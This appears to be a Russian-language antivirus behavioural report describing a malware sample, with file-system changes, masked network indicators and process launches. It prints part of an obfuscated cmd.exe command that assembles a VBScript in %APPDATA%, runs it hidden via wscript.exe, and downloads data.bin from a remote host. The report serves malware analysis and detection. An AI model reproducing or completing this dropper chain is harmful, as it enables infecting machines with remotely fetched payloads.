Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V /C set "YxZlDA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm WHs" "FUnction Aoz(UJGhE,Yayp)" "QC=69" "diM MuIV,Jwhrx8,TxL,AcbJ80,Txghk(5)" "WbM2au=22" "Txghk(0)=104" "Dds=7" "Txghk(1)=100" "K0...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\15843.vbs
Сетевая активность
Подключается к
- 'pa###louf.com':80
- '20#.#7.8.251':80
TCP
Запросы HTTP GET
- http://pa###louf.com/data.bin
UDP
- DNS ASK pa###louf.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\15843.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "YxZlDA=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIm WHs" "FUnction Aoz(UJGhE,Yayp)" "QC=69" "diM MuIV,Jwhrx8,TxL,AcbJ80,Txghk(5)" "WbM2au=22" "Txghk(0)=104" "Dds=7" "Txghk(1)=100" "K0...' (со скрытым окном)
